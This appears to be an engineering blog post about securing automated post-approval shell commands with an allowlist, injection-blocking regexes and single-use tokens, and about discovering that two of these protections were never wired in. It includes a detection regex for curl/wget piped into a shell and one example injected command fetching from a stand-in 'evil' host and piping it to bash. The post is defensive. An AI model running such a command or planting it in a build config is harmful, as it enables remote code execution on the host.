The Code That Was Always There

Five Verdicts and a Suspicion ended with the review pipeline handing approved tasks to a git merge queue. What it didn’t cover is what happens after the merge. Some projects have a post-approval command: a shell command that runs automatically when a task ships. Automated publishing. Build pipelines. The thing that makes the system useful instead of just correct.

The thing that was completely unprotected for weeks.

Six Binaries and a Regex

The allowlist is six entries:

export const ALLOWED_BINARIES = new Set(['npm', 'npx', 'node', 'make', 'docker', 'git'])

Six. That’s the entire vocabulary of commands the system is allowed to run after a human approves a task. Anything not on the list gets blocked before it reaches execFileSync. The binary is extracted from the command string, checked against the set, and rejected if it doesn’t match.

Then there’s a second layer, because the first one isn’t paranoid enough:

const DANGEROUS_ARG_PATTERN = /[|;&`$(){}\\><]|\$\(|`[^`]*`/
const DANGEROUS_COMMAND_PATTERN = /\b(curl|wget)\b.*\|\s*(ba)?sh/i

Shell metacharacters. Pipe chains. Backtick subshells. Command substitution. The system uses execFileSync which already avoids shell interpretation, but someone decided that wasn’t sufficient. If an agent stores npm run build; curl evil | bash in a project’s delivery config, the regex catches it before the process spawns.

Defense-in-depth. The technical term for “we trust nobody, including ourselves.”

The Authorization Gate

After the binary check, there’s a full authorization flow. Single-use tokens with a five-minute TTL:

Approval → Done (review pipeline)
  └─> createDeliveryAuthorization()
      ├─> Re-validates binary allowlist
      ├─> Fresh policy read (no cached values)
      ├─> Fresh spend cap check
      └─> Writes authorization row (immutable audit trail)
  └─> runPostApproveCommand() — only if auth succeeded
  └─> consumeDeliveryAuthorization() — token burned

The authorization function doesn’t trust the cache. It reads the content_release_policy directly from the database. It queries today’s execution spend against the cost guardian caps. It re-validates the binary allowlist even though the DB CHECK constraint already validated it at write time. Then it writes an authorization row: an immutable record of the policy state at the moment of delivery. If someone asks “why did this command run?” six months from now, the answer is in the database.

The token is single-use. consumeDeliveryAuthorization() marks it consumed after the command runs. If the command fails, the token is still consumed. No replays. No retries through the same authorization. You get one shot, and the system remembers whether you took it.

Every five minutes, the heartbeat sweeps expired unconsumed tokens. Orphaned authorizations that were created but never used get cleaned up instead of accumulating forever.

const DELIVERY_AUTHORIZATION_TTL_MS = 5 * 60 * 1000  // 5 minutes

Five minutes. The window between “I’ve decided this command is safe” and “the decision expires.” Long enough for the review worker to finish processing. Short enough that a stale authorization can’t be reused an hour later when conditions have changed.

The Part Where None of This Was Running

The security model above is clean. Layered. Audited. Fail-closed. The kind of thing you’d put in an architecture document and feel good about.

Here’s the problem: applyDeliveryConstraints() was defined in server/lib/delivery-constraints.ts. It was never called from server/index.ts. The DB CHECK constraint that enforces the binary allowlist at write time? The function that applies it existed. The startup sequence that invokes it didn’t.

cleanupExpiredDeliveryAuthorizations() was defined in server/lib/delivery.ts. It was never wired to the heartbeat. The sweep that cleans up orphaned tokens? Implemented. Scheduled? No.

The database migration had run. The schema was correct. The Prisma model existed. The logic was tested. The runtime never executed any of it.

Two functions. Both idempotent. Both safe. Both carefully written. Both sitting in modules that nothing imported.

The fix was three lines in the startup sequence and one heartbeat step.

The Risk Assessment

The session notes for this fix contain a single line of risk assessment:

“None. Both functions were safe/idempotent before; they just weren’t being called.”

That’s the whole thing. The system wasn’t running delivery commands unsafely. It wasn’t running the protection for delivery commands. The vault was engineered, the locking mechanism was calibrated, the alarm was wired. The vault door was leaning against the wall because nobody hung it.

This is not a near-miss story. No commands executed without authorization. The delivery pipeline was gated by a separate policy check that did work, and by the operator’s manual approval flow. The security layers that were dead code were defense-in-depth layers: the second lock, the third check, the cleanup sweep.

But defense-in-depth only works if every layer is running. A single-use token that never gets created is the same as no token at all. A binary allowlist that exists in the schema but never gets enforced at write time is a comment, not a constraint.

What This Is Actually About

Eight Gates and a Loop documented a system where every gate exists because something broke. The delivery authorization gate exists because someone thought about what could break. The distinction matters: reactive gates are scars, proactive gates are insurance. Insurance that isn’t activated isn’t insurance. It’s a receipt for a policy you forgot to sign.

The system had six binaries in an allowlist. Two regex patterns for shell injection. A DB CHECK constraint. Single-use tokens with a five-minute TTL. A heartbeat sweep. An immutable audit trail. All of it correct. None of it connected.

Three lines of code to fix. That’s the distance between “designed” and “deployed.” Three lines, and the entire security model that someone carefully architected started doing its job.

The scariest bugs aren’t the ones that break things. They’re the ones that leave things exactly as they were, quietly, for weeks, while everyone assumes the protection is there because the code is there. Code is not protection. Running code is protection. The difference is an import statement.

Six Binaries and a Regex

The Authorization Gate

The Part Where None of This Was Running

The Risk Assessment

What This Is Actually About

Comments

$ ls ./related